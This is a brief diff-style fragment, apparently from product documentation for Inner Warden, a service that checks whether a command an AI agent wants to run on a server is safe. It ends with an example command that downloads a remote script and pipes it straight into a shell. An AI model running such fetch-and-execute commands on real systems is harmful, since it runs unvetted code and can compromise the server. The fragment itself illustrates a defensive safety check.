Skip to content

 1

 Your agent decides it needs to execute something on your server.
-Before running it, OpenClaw sends the command to Inner Warden's API.
+Before running it, the agent asks Inner Warden if the command is safe.

 curl https://example.com/setup.sh | bash